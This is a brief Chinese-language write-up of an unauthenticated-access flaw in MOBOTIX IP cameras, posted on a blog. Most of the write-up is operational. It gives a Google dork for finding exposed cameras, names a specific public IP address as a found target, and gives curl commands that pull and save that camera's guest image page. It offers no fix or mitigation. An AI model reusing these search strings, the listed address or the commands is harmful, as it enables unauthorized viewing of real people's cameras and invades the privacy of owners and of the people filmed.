MOBOTIX IP摄像头未授权访问漏洞分析

本文详细分析了MOBOTIX IP摄像头存在的未授权访问漏洞,包含Google Dork搜索方法、直接访问验证步骤以及使用cURL捕获摄像头界面的具体操作流程。

MOBOTIX IP摄像头未授权访问

2025.06.20
提交者:hasanwlip

风险等级: 中危
本地漏洞:
远程漏洞:
CVE编号:
CWE分类: CWE-306

搜索语句:

1

intext:"© 2001-2025 MOBOTIX" -site:*.* -inurl:www

漏洞复现步骤

步骤1:通过Google Dork搜索

结果: http://195.70.120.133/

步骤2:在浏览器中访问IP地址

摄像头界面直接加载,无需任何身份验证。

步骤3:使用cURL捕获摄像头界面内容 

1

curl http://195.70.120.133/cgi-bin/guestimage.html

可选操作:将原始HTML内容保存到文件 

1

curl http://195.70.120.133/cgi-bin/guestimage.html --output snap.html

参考链接

  1. https://www.google.com/search?q=intext:%22%C2%A9+2001-2025+MOBOTIX%22+-site:.+-inurl:www
  2. https://www.mobotix.com/en(官方供应商网站)
  3. 由hasanwlip发现并报告

查看原始版本说明

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次